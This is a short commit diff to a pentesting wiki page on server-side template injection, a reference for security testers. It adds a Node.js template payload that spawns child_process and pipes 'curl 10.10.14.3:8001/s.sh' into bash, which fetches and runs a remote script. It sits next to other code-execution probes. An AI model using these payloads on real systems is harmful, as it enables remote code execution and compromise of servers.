GitBook: [#2902] No subject

pentesting-web/ssti-server-side-template-injection/README.md

@@ -338,7 +338,7 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
 ### Expression Language - EL (Java)
 
 * `${"aaaa"}` - "aaaa"
-* `${99999+1}` - 100000. 
+* `${99999+1}` - 100000. 
 * `#{7*7}` - 49
 * `${{7*7}}` - 49
 * `${{request}}, ${{session}}, {{faceContext}}`
@@ -501,6 +501,7 @@ URLencoded:
 
 * `#{7*7} = 49`
 * `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
+* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
 
 #### Example server side render